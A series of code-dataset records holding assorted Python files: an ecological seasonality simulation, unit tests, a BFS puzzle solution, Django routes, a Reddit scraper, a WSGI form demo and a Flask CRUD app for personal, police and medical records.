= nlmpy.mpd(nRow=self.max_y, nCol=self.max_x, h=autocorrelation)\n self.environment = carrying_capacity * nlmpy.classifyArray(continuous_env, [n0, p])\n self.pop_size = []\n self.list_step = []\n self.list_diversion = []\n self.list_resources = []\n self.direction_seasonality = 1\n self.seasonality = [0, int(self.max_x / 2)]\n self.mean_step = []\n self.mean_diversion = []\n self.mean_resources = []\n self.mean_regrowth = []\n self.list_regrowth = []\n self.list_x = []\n self.mean_x = []\n\n self.movie = False\n if self.movie:\n self.visual = Visual(self.max_x, self.max_y)\n\n for x_coord in range(self.max_x):\n for y_coord in range(self.max_y):\n if self.environment[x_coord][y_coord] > 0:\n self.list_resources.append([x_coord, y_coord])\n\n self.initialize_pop()\n\n def initialize_pop(self):\n ''' initialize the population'''\n start_pop = start_population\n\n for n in range(start_pop):\n coordinates = rnd.choice(self.list_resources)\n x_start = coordinates[0]\n y_start = coordinates[1]\n step_mean = rnd.uniform(step_min, step_max)\n diversion = rnd.uniform(div_min, div_max)\n angle = rnd.uniform(0, 2 * math.pi)\n self.population.append(Individual(x_start, y_start, mass, step_mean, diversion, angle, self))\n self.list_step.append(step_mean)\n self.list_diversion.append(diversion)\n self.list_x.append(x_start)\n\n def a_day_in_the_life(self):\n '''An hour in the life of the individual'''\n rnd.shuffle(self.population)\n old_pop = self.population[:]\n self.population.clear()\n for ind in old_pop:\n ind.move()\n if ind.alive:\n if 0 <= ind.x < max_x:\n resources_position = self.environment[int(ind.x)][int(ind.y)]\n eaten = min(resources_position, ind.ingestion) # an individual eats at most its ingestion capacity\n ind.resources += eaten\n self.environment[int(ind.x)][int(ind.y)] -= eaten # remove only what was actually eaten, not the whole energy reserve\n if ind.reproductive_age <= ind.age:\n ind.reproduction()\n else:\n ind.age += 1\n self.population.append(ind)\n else:\n ind.die()\n\n if self.movie:\n for x in range(self.max_x):\n for y in range(self.max_y):\n self.visual.color_square(self.environment[x, y], x, y)\n\n for patch in self.list_resources:\n if patch[0] in range(self.seasonality[0], self.seasonality[1]):\n self.list_regrowth.append((2 * regrowth) * (1 - self.environment[patch[0]][patch[1]] / (2 * carrying_capacity)))\n self.environment[patch[0]][patch[1]] += 2 * regrowth * (1 - self.environment[patch[0]][patch[1]] / (2 * carrying_capacity))\n\n\n np.clip(self.environment, 0, carrying_capacity, out=self.environment)\n self.pop_size.append(len(self.population))\n self.mean_resources.append(np.mean(self.environment))\n self.mean_step.append(np.mean(self.list_step))\n self.mean_diversion.append(np.mean(self.list_diversion))\n self.mean_regrowth.append(np.mean(self.list_regrowth))\n self.mean_x.append(np.mean(self.list_x))\n self.list_regrowth.clear()\n\n if self.movie:\n self.visual.canvas.update()\n\n\nmutation_rate = 0.01\ngenerations = 30000\ncell_size = 0.25 #m\nmass = 0.001\nlist_h = [0, 0.5, 1]\nlist_p = [0.05, 0.2, 0.5, 0.9]\nregrowth = 15 * ((2 * mass ** 0.8) * (3600 - 150))\ncarrying_capacity = 20 * ((2 * mass ** 0.8) * (3600 - 150))\ntimer_list = range(generations)\ncolor_list = [\"yellow\", \"red\", \"green\", \"blue\", \"black\", \"cyan\", \"magenta\", \"brown\", \"orange\"]\nmax_x = 150\nmax_y = 150\nruns = 9\nstart_population = 10000\nstep_min, step_max = 0, 10\ndiv_min, div_max = 0, math.pi\n\nwith open(\"random walk with seasonality.csv\", \"w\") as csvfile:\n writer = csv.writer(csvfile, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL)\n writer.writerow(['mass (kg)',
'autocorrelation', 'suitable habitat', 'run', 'step mean', 'mean divergence',\n 'population size', 'mean resources', 'mean regrowth', 'mean x'])\n\nwith open(f'runs random walk with seasonality (p = {list_p[-1]}).csv', \"w\") as csvfile:\n writer = csv.writer(csvfile, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL)\n writer.writerow(['mass (kg)', 'autocorrelation', 'suitable habitat', 'run', 'ind', 'step length',\n 'divergence', 'x-position'])\n\nfor autocorrelation in list_h:\n for suitable_habitat in list_p:\n\n fig, ((ax1, ax2), (ax3, ax4), (ax5, ax6)) = plt.subplots(3, 2, sharex=True, figsize=(8, 8))\n fig1, axises1 = plt.subplots(3, 3, figsize=(8, 8))\n fig2, axises2 = plt.subplots(3, 3, figsize=(8, 8))\n fig6, axises6 = plt.subplots(3, 3, figsize=(8, 8))\n fig3, axises3 = plt.subplots(3, 3, figsize=(8, 8))\n fig4, axises4 = plt.subplots(3, 3, figsize=(8, 8))\n fig5, axises5 = plt.subplots(3, 3, figsize=(8, 8))\n ax1.set_title('Population size')\n ax2.set_title('Mean amount of resources (J)')\n ax3.set_title('Mean divergence (rad)')\n ax4.set_title('Mean step length (grid cells)')\n ax5.set_title('Mean regrowth')\n ax6.set_title('Mean x-coordinate')\n\n for simulation in range(runs):\n meta = Metapopulation(max_x, max_y)\n axises1[simulation // 3, simulation % 3].hist(meta.list_diversion)\n axises2[simulation // 3, simulation % 3].hist(meta.list_step)\n axises3[simulation // 3, simulation % 3].hist(meta.list_x)\n for timer in range(generations):\n if timer % 720 == 0 and timer != 0:\n meta.seasonality[0] += meta.direction_seasonality\n meta.seasonality[1] += meta.direction_seasonality\n if meta.seasonality[1] == meta.max_x or meta.seasonality[0] == 0:\n meta.direction_seasonality = -meta.direction_seasonality\n meta.a_day_in_the_life()\n print(timer)\n print(len(meta.population))\n \n if timer == generations - 1:\n if meta.pop_size[-1] > 100:\n sample_pop = []\n copy_pop = meta.population[:]\n for i in range(100):\n sample = rnd.choice(copy_pop)\n sample_pop.append(sample)\n copy_pop.remove(sample)\n else:\n sample_pop = meta.population[:]\n ind_nr = 1\n for i in sample_pop:\n with open(f'runs random walk with seasonality (p = {list_p[-1]}).csv', 'a', newline='') as ind:\n iwriter = csv.writer(ind)\n iwriter.writerow([f'{mass}', f'{autocorrelation}', f'{suitable_habitat}', f'{simulation}',\n f'{ind_nr}', f'{i.step_mean}', f'{i.diversion}', f'{i.x}'])\n ind_nr += 1\n\n\n\n with open(\"random walk with seasonality.csv\", 'a', newline='') as f:\n fwriter = csv.writer(f)\n fwriter.writerow([f'{mass}', f'{autocorrelation}', f'{suitable_habitat}', f'{simulation}',\n f'{meta.mean_step[-1]}', f'{meta.mean_diversion[-1]}', f'{meta.pop_size[-1]}',\n f'{meta.mean_resources[-1]}', f'{meta.mean_regrowth[-1]}', f'{meta.mean_x[-1]}'])\n\n ax1.plot(timer_list, meta.pop_size, color_list[simulation], animated=False)\n ax2.plot(timer_list, meta.mean_resources, color_list[simulation], animated=False)\n ax3.plot(timer_list, meta.mean_diversion, color_list[simulation], animated=False)\n ax4.plot(timer_list, meta.mean_step, color_list[simulation], animated=False)\n ax5.plot(timer_list, meta.mean_regrowth, color_list[simulation], animated=False)\n ax6.plot(timer_list, meta.mean_x, color_list[simulation], animated=False)\n axises4[simulation // 3, simulation % 3].hist(meta.list_diversion)\n axises5[simulation // 3, simulation % 3].hist(meta.list_step)\n axises6[simulation // 3, simulation % 3].hist(meta.list_x)\n\n fig.legend(labels=[f\"Run {i}\" for i in range(runs)], loc=\"lower center\", ncol=5)\n 
fig.savefig(f'random walk with seasonality (mass = 1.25g, p = {suitable_habitat} and h = {autocorrelation}).png', dpi=200)\n fig1.suptitle('Distribution of divergence at time = 0', size=20)\n fig2.suptitle('Distribution of step length at time = 0', size=20)\n fig3.suptitle('Distribution of x-coordinates at time = 0', size=20)\n fig4.suptitle(f'Distribution of divergence at time = {timer}', size=20)\n fig5.suptitle(f'Distribution of step length at time = {timer}', size=20)\n fig6.suptitle(f'Distribution of x-coordinates at time = {timer}', size=20)\n\n fig1.savefig('fig1.png', dpi=200)\n fig2.savefig('fig2.png', dpi=200)\n fig3.savefig('fig3.png', dpi=200)\n fig4.savefig('fig4.png', dpi=200)\n fig5.savefig('fig5.png', dpi=200)\n fig6.savefig('fig6.png', dpi=200)\n files = [Image.open(pic) for pic in [f'fig{i}.png' for i in range(1, 7)]]\n w, h = 400, 400\n result = Image.new(\"RGB\", (w * 2, h * 3))\n\n for index, file in enumerate(files):\n file.thumbnail((w, h), Image.ANTIALIAS)\n x = index // 3 * w\n y = index % 3 * h\n result.paste(file, (x, y, x + w, y + h))\n result.save(f'allele distribution random walk with seasonality (mass = 1.25g, p = {suitable_habitat} and h = {autocorrelation}).png', dpi=(300, 300))\n\nif meta.movie:\n tk.mainloop()\n","sub_path":"Seasonal landscape/code seasonal.py","file_name":"code seasonal.py","file_ext":"py","file_size_in_byte":16066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"48573500","text":"import pytest\nfrom compute_graph import ComputeGraph\nfrom compute_graph.operation import Map\n\n\ndef get_simple_data():\n return [\n {\"1\": 1, \"2\": 2},\n {\"1\": 3, \"2\": 4},\n {\"1\": 5, \"2\": 6},\n {\"1\": 7, \"2\": 8}\n ]\n\ndef mapper_1(r):\n yield {\n \"1\": r[\"2\"]\n }\n\ndef mapper_2(r):\n for key, value in r.items():\n yield {\n key: value\n }\n\n\ndef test_simple_map():\n g = ComputeGraph(inputs=get_simple_data(), outputs=[],\n save_to_variable=True)\n g.add(Map(mapper=mapper_1))\n g.compile()\n g.run()\n resp = [\n {\"1\": 2},\n {\"1\": 4},\n {\"1\": 6},\n {\"1\": 8}\n ]\n assert g.output_node.output == resp\n\ndef test_one_to_many_map():\n g = ComputeGraph(inputs=get_simple_data(), outputs=[],\n save_to_variable=True)\n g.add(Map(mapper=mapper_2))\n g.compile()\n g.run()\n resp = [\n {\"1\": 1}, {\"2\": 2},\n {\"1\": 3}, {\"2\": 4},\n {\"1\": 5}, {\"2\": 6},\n {\"1\": 7}, {\"2\": 8}\n ]\n assert g.output_node.output == resp\n\n\n\n\n\n","sub_path":"1st-term/Python/computation-graph/tests/test_map.py","file_name":"test_map.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"220372292","text":"\"\"\"\nTest the application startup template\n\nThis script provides unit testLogging that validate the template\n`global_village_start.py`. Part of the code in the template runs at module\nlevel. This code will be checked by importing the module that contains the\ntemplate script.\n\n.. only:: development_administrator\n\n Module management\n \n Created on Apr. 
30, 2020\n \n @author: Jonathan Gossage\n\"\"\"\n\nimport importlib\nimport unittest\nimport sys\n\nimport lib.configuration as _c\nfrom lib.configuration import Configuration as _C\n\ntemplate = 'pydev.gv_start_template'\n\ndef verifyModule(self):\n cfg = self._tp.cfg # Get the actual configuration\n #TODO: startup_test - This test will run with simulated command line arguments and configuration files\n cfg[_c.noargs] = True\n _C.insert(cfg.cmdargs)\n \n # Now test the results from running the high-level module-level\n # code. This actually ran in the setUp method since the template was\n # imported there.\n self.assertTrue(isinstance(cfg, dict),\n f'The configuration is not a dictionary - {type(cfg)}')\n l = _C(cfg).len() # Number of entries in the configuration\n num = 8 # The expected number of entries in the configuration\n self.assertEqual(l, num,\n f'The configuration dictionary should have {num} item(s), has {l} '\n f'\\n The entries are: {cfg}')\n #TODO: Cleanup and use the platform module to use this code\n \"\"\"\n plid = cfg.plid # The determined operating system\n plsys = 'linux' # The expected operating system\n self.assertEqual(plid, plsys,\n 'The configuration dictionary should say running on {} - is {}'.\\\n format(plid, plsys))\n \"\"\"\n self.assertIsNone(cfg[_c.uac],\nf'We should not have access to the user startup module yet - have {cfg[_c.uac]}')\n\ndef verifyFunction(self):\n num = 10 # The expected number of entries in the configuration\n l = _C(self._tp.cfg).len() # Number of entries in the configuration\n self.assertEqual(l, num,\n f'The configuration dictionary should have {num} item(s), has {l} '\n '\\n The entries are: {cfg}')\n\ndef reload(template):\n if template not in sys.modules:\n _tp = importlib.import_module(template)\n else:\n # Reloading the module gets rid of the old\n # copy of the template\n _tp = importlib.reload(sys.modules[template])\n return _tp\n\n\nclass TestModule(unittest.TestCase):\n\n def setUp(self):\n \"\"\"\n This will load the script module and will run the module level code\n without invoking the code in the main() module level function. The\n main() function will be invoked separately thus separating the testing\n of the two levels of code\n \"\"\"\n self._tp = reload(template)\n\n def testModule(self):\n verifyModule(self)\n\n@unittest.skip('Not fully implemented yet')\nclass TestFunction(unittest.TestCase):\n \"\"\"\n The unittest driver for the `StartupApp` template\n This is a functional test that verifies that the StartupApp template does\n the right thing and is usable as a template.\n \"\"\"\n \n def setUp(self):\n \"\"\"\n This will load the script module and will run the module level code\n without invoking the code in the main() module level function.
The\n main() function will be invoked separately thus separating the testing\n of the two levels of code.\n \"\"\"\n\n self._tp = reload(template)\n\n def testFunction(self):\n\n verifyModule(self)\n \n # The next step is to run the main() function\n self._tp.main()\n\n # Run unit testLogging on the result of running the main startup function\n verifyFunction(self)\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"lib/test/unittests/startup_test.py","file_name":"startup_test.py","file_ext":"py","file_size_in_byte":3932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"236943664","text":"from collections import deque\n\ndx = [-1, 0, 0, 1]\ndy = [0, -1, 1, 0]\nshark = []\nN = int(input())\nlst= []\nfor _ in range(N):\n lst.append(list(map(int, input().split())))\n\nfor i in range(N):\n for j in range(N):\n if lst[i][j] == 9:\n shark = (2,i,j)\n lst[i][j] = 0\n\ncnt = 0\n\n# bfs\ndef bfs(shark,cnt, stack):\n q= deque()\n q.append([shark[1],shark[2]])\n visited = [[-1]*N for _ in range(N)]\n visited[shark[1]][shark[2]] = cnt\n eatLst = []\n while q:\n qlen = len(q)\n while qlen:\n x,y = q.popleft()\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0<=nx /', views.detail, name='detail'),\n path('current_number//', views.current_number, name='current_number'),\n path('api/increment/', views.increment, name='increment'),\n path('get_wallet/', views.get_wallet, name='get_wallet'),\n path('get_queue//', views.get_queue, name='get_queue'),\n path('assign_number/', views.assign_number, name='assign_number'),\n path('', views.listing, name='listing'),\n path('compare_faces/', views.compare_faces, name='compare_faces'),\n path('login/', views.login, name='login')\n]\n","sub_path":"queuer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"309486876","text":"import tensorflow as tf\nimport os\nimport logging\ndef start_session():\n saver = tf.train.Saver()\n sess = tf.get_default_session()\n init = tf.global_variables_initializer()\n sess.run(init)\n # Start the queue runners.\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n\n session = {}\n session['sess'] = sess\n session['saver'] = saver\n session['coord'] = coord\n session['thread'] = threads\n\n return session\n\ndef cfg():\n \"\"\"General configuration values.\"\"\"\n return None\n\n\ndef _set_cfg_value(cfg_name, env_name, default, cfg):\n \"\"\"Set a value for the configuration.\n\n Parameters\n ----------\n cfg_name : str\n env_name : str\n default : str\n cfg : function\n \"\"\"\n if env_name in os.environ:\n setattr(cfg, cfg_name, os.environ[env_name])\n else:\n logging.info(\"No environment variable '%s' found. 
Set to '%s'.\",\n env_name,\n default)\n setattr(cfg, cfg_name, default)\n\n\n_set_cfg_value('plugin_dir',\n 'TV_PLUGIN_DIR',\n os.path.expanduser(\"~/tv-plugins\"),\n cfg)\n_set_cfg_value('step_show', 'TV_STEP_SHOW', 50, cfg)\n_set_cfg_value('step_eval', 'TV_STEP_EVAL', 250, cfg)\n_set_cfg_value('step_write', 'TV_STEP_WRITE', 1000, cfg)\n_set_cfg_value('max_to_keep', 'TV_MAX_KEEP', 10, cfg)\n_set_cfg_value('step_str',\n 'TV_STEP_STR',\n ('Step {step}/{total_steps}: loss = {loss_value:.2f}; '\n 'lr = {lr_value:.2e}; '\n '{sec_per_batch:.3f} sec (per Batch); '\n '{examples_per_sec:.1f} imgs/sec'),\n cfg)\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"381197785","text":"#!/usr/bin/python\n\"\"\"\nWatcher daemon-process\n\"\"\"\nimport time\nimport json\nimport hashlib\nimport os\nimport sys\nsys.path.append('/isodenv/scripts')\nfrom deployer_lib import *\n\ndef get_hash(path):\n \"\"\"\n Get hash for path to artifact\n \"\"\"\n return hashlib.md5(open(path, 'rb').read()).hexdigest()\n\ndef check_arts():\n \"\"\"\n Check valid json time config\n \"\"\"\n for art in ARTIFACTS:\n if JSONTIME[art][0] == \"\" or JSONTIME[art][1] == \"\" \\\n or JSONTIME[art][2] == \"\":\n return False\n return True\n\nwith open('/var/isodenv/watcher.pid', 'w') as pid:\n pid.write(str(os.getpid()))\n\nwith open('/isodenv/configs/config.json') as config:\n JSONDATA = json.loads(config.read())\n\nwith open('/var/isodenv/time.json') as config:\n JSONTIME = json.loads(config.read())\n\nARTIFACTS = JSONDATA['general']['artifacts'].split(', ')\n\nSKIP_DIRS = []\nif valid_config()['skip_dirs']:\n SKIP_DIRS = JSONDATA['general']['skip-directory'].split(', ')\n\nINTERVAL = parse_config()['interval']\n\nDEPLOY = False\nwhile not check_arts():\n DEPLOY = True\n set_time()\n with open('/var/isodenv/time.json') as config:\n JSONTIME = json.loads(config.read())\n time.sleep(INTERVAL)\n\nif DEPLOY:\n redeploy_app()\n set_time()\n\nwhile True:\n for key in ARTIFACTS:\n path_to_key = JSONTIME[key][2]\n clock = time.ctime(os.path.getmtime(path_to_key))\n if clock != JSONTIME[key][0]:\n if get_hash(path_to_key) != JSONTIME[key][1]:\n set_time()\n with open('/var/isodenv/time.json') as config:\n JSONTIME = json.loads(config.read()) \n if not check_arts():\n break \n redeploy_app()\n time.sleep(INTERVAL)\n","sub_path":"scripts/watch.py","file_name":"watch.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"79214914","text":"import re\nimport time\nfrom urllib.parse import urljoin\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nREDDIT_OLD_URL = 'https://old.reddit.com/r/'\nHEADERS = {'User-Agent': 'Mozilla/5.0'}\nNUM_REGEX = re.compile('[^0-9eE.]')\n\nFIELDS = ['Pontuação', 'Subreddit', 'Título', 'Comentários', 'Link']\n\n\nclass RedditScrapper:\n\n def __init__(self, subreddits='', min_votes=5000, num_pages=5):\n self.subreddits = subreddits.split(';')\n self.min_votes = min_votes\n self.num_pages = num_pages\n\n def run(self, format='string'):\n result = []\n for subreddit in self.subreddits:\n # initial url for subreddit\n url = urljoin(REDDIT_OLD_URL, subreddit)\n for i in range(self.num_pages):\n content = requests.get(url, headers=HEADERS).content\n soup = BeautifulSoup(content, features=\"html.parser\")\n for thread in soup.find_all('div', class_='thing'):\n votes = 
self._parse_votes(thread)\n if votes >= self.min_votes:\n link, title, comments = self._parse_links_and_title(\n thread, url)\n result.append(\n {\n key: value for key, value in\n zip(FIELDS,\n (votes, subreddit, title, comments, link))\n }\n )\n # find next page link and update url for next iteration\n url = soup.find('span', class_='next-button').find('a').attrs[\n 'href']\n # slowing down the scrapper\n time.sleep(2)\n\n return self._format_result(result, format)\n\n def _parse_votes(self, thread):\n text = thread.find('div', class_='score unvoted').text\n # deal with new threads w/out votes\n text = text.replace('•', '0')\n # deal with thousand multipliers (is million necessary?)\n multiplier = {'k': 1e3, 'm': 1e6}\n if text[-1] in multiplier:\n return int(float(text[:-1]) * multiplier[text[-1]])\n return int(text)\n\n def _parse_links_and_title(self, thread, url):\n title_link = thread.find('a', class_='title')\n # outbound links are absolute but inbound links are relative\n if 'outbound' in title_link.attrs['class']:\n title_href = title_link.attrs['href']\n else:\n title_href = urljoin(url, title_link.attrs['href'])\n comment_link = thread.find('a', class_='comments')\n return title_href, title_link.text, comment_link.attrs[\n 'href']\n\n def _format_result(self, result, format):\n if not result:\n return \"Nenhuma thread bombando no momento :(\"\n str_list = []\n for thread in result:\n str_list.append(\n '\\n'.join(\n [f'{key} = {value}' for key, value in thread.items()]))\n if format == 'list':\n return str_list\n return '\\n\\n'.join(str_list)\n\n\nif __name__ == '__main__':\n s = RedditScrapper('cats;programming;brazil', 1000)\n print(s.run())\n","sub_path":"crawlers/scrapper.py","file_name":"scrapper.py","file_ext":"py","file_size_in_byte":3202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"198060110","text":"#!/usr/bin/env python\r\nimport os\r\nimport sys\r\nimport cgi\r\nfrom cgi import parse_qs\r\n\r\nform = b'''\r\n \r\n \r\n GET & POST Hello World!\r\n \r\n \r\n
\r\n \r\n \r\n \r\n

\r\n '''\r\n\r\ndef app(environ, start_response):\r\n \r\n html = form\r\n \r\n if environ['REQUEST_METHOD'] == 'POST':\r\n post_env = environ.copy()\r\n post_env['QUERY_STRING'] = ''\r\n post = cgi.FieldStorage(\r\n fp=environ['wsgi.input'],\r\n environ=post_env,\r\n keep_blank_values=True\r\n )\r\n html += b'Your POST parameter: ' + post['examplePost'].value + ';'\r\n\r\n if environ['REQUEST_METHOD'] == 'GET':\r\n params = parse_qs(environ['QUERY_STRING'])\r\n for key, values in params.iteritems():\r\n html += b'Your GET parameter: ' + key + ' has values: '\r\n for value in values:\r\n html += b'' + value + ',
'\r\n\r\n end = b'''\r\n

\r\n
\r\n \r\n \r\n '''\r\n html += end\r\n\r\n start_response('200 OK', [('Content-Type', 'text/html')])\r\n return [html]\r\n\r\nif __name__ == '__main__':\r\n try:\r\n from wsgiref.simple_server import make_server\r\n httpd = make_server('127.0.0.1', 8081, app)\r\n print('Server is up on port 8081')\r\n httpd.serve_forever()\r\n except KeyboardInterrupt:\r\n print(' Oh no, I died .-.')\r\n","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"183212962","text":"from app import app, db\nfrom flask import render_template, request, redirect, url_for, flash\nfrom .models import (Pribadi, Polsek, Medcen, DataLapor, \n NomorLayananPolsek, NomorLayananMedcen, WebsiteResmiPolsek, WebsiteResmiMedcen, \n ProsedurLaporPolsek, ProsedurLaporMedcen, User)\nfrom flask_login import login_user, current_user, logout_user, login_required\nfrom .forms import LoginForm\n\n\n\n@app.route('/dashboard')\n@login_required\ndef home(): \n return render_template('index.html', title='Dashboard', menu='dashboard', \n data=Pribadi.query.all(), data2=Polsek.query.all(), data3=Medcen.query.all(), data4a=ProsedurLaporPolsek.query.all(), \n data4b=ProsedurLaporMedcen.query.all(), data5a=NomorLayananPolsek.query.all(), data5b=NomorLayananMedcen.query.all(), \n data6a=WebsiteResmiPolsek.query.all(),data6b=WebsiteResmiMedcen.query.all(), data7=DataLapor.query.all())\n\n@app.route('/', methods=['GET','POST'])\n@app.route('/login', methods=['GET','POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n form = LoginForm()\n if form.validate_on_submit():\n user = User.query.filter_by(username=form.username.data).first()\n if user and user.password == form.password.data: # check this user's own password, not any user's\n login_user(user)\n next_page = request.args.get('next')\n return redirect(next_page) if next_page else redirect(url_for('home'))\n # return redirect(url_for('home'))\n return render_template('login.html', form=form, title='Login')\n\n\n@app.route('/logout')\ndef logout():\n logout_user()\n return redirect(url_for('login'))\n\n@app.route('/pribadi/')\n@login_required\ndef pribadi():\n return render_template('pribadi/pribadi.html', title='Pribadi', submenu='dataPribadi', link1='Data Pribadi' ,data=Pribadi.query.all())\n\n@app.route('/pribadi/tambah/', methods=['GET','POST'])\n@login_required\ndef pribadiAdd():\n if request.method == 'POST':\n nrp = request.form['nrp']\n ktp = request.form['ktp']\n kk = request.form['kk']\n stnk = request.form['stnk']\n nama = request.form['nama']\n alamat = request.form['alamat']\n nophone = request.form['nophone']\n data = Pribadi(nrp=nrp, ktp=ktp, kk=kk, stnk=stnk, nama=nama, alamat=alamat, nomorHP=nophone)\n db.session.add(data)\n db.session.commit()\n return redirect(url_for('pribadi'))\n else:\n return render_template('pribadi/pribadiAdd.html', title='Tambah Pribadi', submenu='dataPribadi' ,link1='Data Pribadi', link2='Tambah Data Pribadi', link3='pribadi/')\n\n@app.route('/pribadi/<nrp>/ubah/', methods=['GET','POST'])\n@login_required\ndef pribadiEdit(nrp):\n data = Pribadi.query.filter_by(nrp=nrp).first()\n if request.method == 'POST':\n data.nrp = request.form['nrp']\n data.ktp = request.form['ktp']\n data.kk = request.form['kk']\n data.stnk = request.form['stnk']\n data.nama = request.form['nama']\n data.alamat = request.form['alamat']\n data.nomorHP = request.form['nophone']\n db.session.add(data)\n
db.session.commit()\n return redirect(url_for('pribadi'))\n else:\n return render_template('pribadi/pribadiAdd.html', title='Ubah Pribadi', submenu='dataPribadi' ,link1='Data Pribadi', link2='Ubah Data Pribadi', link3='pribadi/', data=data)\n\n@app.route('/pribadi/<nrp>/hapus/', methods=['GET','POST'])\n@login_required\ndef pribadiDel(nrp):\n data = Pribadi.query.filter_by(nrp=nrp).first()\n db.session.delete(data)\n db.session.commit()\n return redirect(url_for('pribadi'))\n# End of Pribadi\n\n\n# Start of DataLapor\n@app.route('/data_lapor/')\n@login_required\ndef lapor():\n return render_template('lapor/lapor.html', title='Data Lapor', submenu='data Lapor', link1='Data Lapor' ,data=DataLapor.query.all())\n\n@app.route('/data_lapor/tambah/', methods=['GET','POST'])\n@login_required\ndef laporAdd():\n if request.method == 'POST':\n nama = request.form['nama']\n kejadian = request.form['kejadian']\n nomorHP = request.form['nophone']\n lembaga = request.form['lembaga']\n data = DataLapor(nama=nama, kejadian=kejadian, nomorHP=nomorHP, lembagaBerwenang=lembaga)\n db.session.add(data)\n db.session.commit()\n return redirect(url_for('lapor'))\n else:\n return render_template('lapor/laporAdd.html', title='Data Lapor', submenu='data Lapor', link1='Data Lapor', link2='Tambah Data Lapor', link3='lapor/', data2=Pribadi.query.all())\n\n@app.route('/data_lapor/<id>/ubah/', methods=['GET','POST'])\n@login_required\ndef laporEdit(id):\n data = DataLapor.query.filter_by(id=id).first()\n if request.method == 'POST':\n data.nama = request.form['nama']\n data.kejadian = request.form['kejadian']\n data.nomorHP = request.form['nophone']\n data.lembagaBerwenang = request.form['lembaga']\n db.session.commit()\n return redirect(url_for('lapor'))\n else:\n return render_template('lapor/laporAdd.html', title='Ubah Lapor', submenu='data Lapor' ,link1='Data Lapor', link2='Ubah Data Lapor', link3='lapor/', data=data)\n\n@app.route('/data_lapor/<id>/hapus/', methods=['GET','POST'])\n@login_required\ndef laporDel(id):\n data = DataLapor.query.filter_by(id=id).first()\n db.session.delete(data)\n db.session.commit()\n return redirect(url_for('lapor'))\n\n# End of DataLapor\n\n\n# Start of Polsek\n\n@app.route('/polsek/')\n@login_required\ndef polsek():\n return render_template('polsek/polsek.html', title='Polsek', submenu='dataPolsek', link1='Data Polsek' ,data=Polsek.query.all())\n\n@app.route('/polsek/tambah/', methods=['GET','POST'])\n@login_required\ndef polsekAdd():\n if request.method == 'POST':\n kodePolsek = request.form['kdPolsek']\n namaPolsek = request.form['namaPolsek']\n alamatPolsek = request.form['alamat']\n data = Polsek(kodePolsek=kodePolsek, namaPolsek=namaPolsek, alamatKantor=alamatPolsek)\n db.session.add(data)\n db.session.commit()\n return redirect(url_for('polsek'))\n else:\n return render_template('polsek/polsekAdd.html', title='Tambah Polsek', submenu='dataPolsek' ,link1='Data Polsek', link2='Tambah Data Polsek', link3='polsek/')\n\n@app.route('/polsek/<kodePolsek>/ubah/', methods=['GET','POST'])\n@login_required\ndef polsekEdit(kodePolsek):\n data = Polsek.query.filter_by(kodePolsek=kodePolsek).first()\n if request.method == 'POST':\n data.kodePolsek = request.form['kdPolsek']\n data.namaPolsek = request.form['namaPolsek']\n data.alamatKantor = request.form['alamat']\n db.session.add(data)\n db.session.commit()\n return redirect(url_for('polsek'))\n else:\n return render_template('polsek/polsekAdd.html', title='Ubah Polsek', submenu='dataPolsek' ,link1='Data Polsek', link2='Ubah Data Polsek', link3='polsek/',
data=data)\n\n@app.route('/polsek//hapus/', methods=['GET','POST'])\n@login_required\ndef polsekDel(kodePolsek):\n data = Polsek.query.filter_by(kodePolsek=kodePolsek).first()\n db.session.delete(data)\n db.session.commit()\n return redirect(url_for('polsek'))\n\n# Akhir Polsek\n\n\n# Awal Medcen\n\n@app.route('/medcen/')\n@login_required\ndef medcen():\n return render_template('medcen/medcen.html', title='Medcen', submenu='dataMedcen', link1='Data Medcen' ,data=Medcen.query.all())\n\n@app.route('/medcen/tambah/', methods=['GET','POST'])\n@login_required\ndef medcenAdd():\n if request.method == 'POST':\n alamatKantor = request.form['alamatKantor']\n data = Medcen(alamatKantor=alamatKantor)\n db.session.add(data)\n db.session.commit()\n return redirect(url_for('medcen'))\n else:\n return render_template('medcen/medcenAdd.html', title='Tambah Medcen', submenu='dataMedcen' ,link1='Data Medcen', link2='Tambah Data Medcen', link3='medcen/')\n\n@app.route('/medcen//ubah/', methods=['GET','POST'])\n@login_required\ndef medcenEdit(id):\n data = Medcen.query.filter_by(id=id).first()\n if request.method == 'POST':\n data.alamatKantor = request.form['alamatKantor']\n db.session.add(data)\n db.session.commit()\n return redirect(url_for('medcen'))\n else:\n return render_template('medcen/medcenAdd.html', title='Ubah Medcen', submenu='dataMedcen' ,link1='Data Medcen', link2='Ubah Data Medcen', link3='medcen/', data=data)\n\n@app.route('/medcen//hapus/', methods=['GET','POST'])\n@login_required\ndef delMedcen(id):\n data = Medcen.query.filter_by(id=id).first()\n db.session.delete(data)\n db.session.commit()\n return redirect(url_for('medcen'))\n\n# Akhir Medcen\n\n\n\n\n# Awal Prosedur\n\n@app.route('/prosedur/')\n@login_required\ndef prosedur():\n return render_template('prosedur/prosedur.html', title='Prosedur', submenu='dataProsedur', link1='Data Prosedur' 